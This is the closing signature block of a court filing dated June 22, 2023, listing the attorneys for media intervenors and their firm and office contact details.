Dated: June 22, 2023             /s/ David L. Finger
                     David L. Finger (ID #2556)
                     FINGER & SLANINA, LLC
                     One Commerce Center
                     1201 N. Orange St., 7th fl.
                     Wilmington, DE 19801
                     302.573.2525

                     Katie Townsend (pro hac vice)
                     THE REPORTERS COMMITTEE FOR
                     FREEDOM OF THE PRESS
                     1156 15th Street NW, Suite 1020
                     Washington, DC 20005
                     202.795.9300
                     ktownsend@rcfp.org

                     *Counsel for Media Intervenors*